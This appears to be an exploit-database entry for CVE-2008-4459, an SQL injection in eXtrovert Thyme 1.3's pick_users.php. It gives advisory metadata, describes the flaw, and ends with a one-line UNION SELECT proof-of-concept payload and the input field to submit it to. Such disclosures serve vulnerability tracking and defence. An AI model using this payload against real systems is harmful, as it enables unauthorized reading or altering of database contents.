eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection
Author: Omer Singer
type: webapps
platform: php
port:
date_added: 2008-09-08
date_updated: 2014-03-18
verified: 1
codes: CVE-2008-4459;OSVDB-47956
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/31063/info
eXtrovert software Thyme is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Thyme 1.3 is affected; other versions may also be vulnerable.
Submit the following to the input field at /thyme/modules/groups/pick_users.php:
' union all select proof,of,concept from mysql.db/*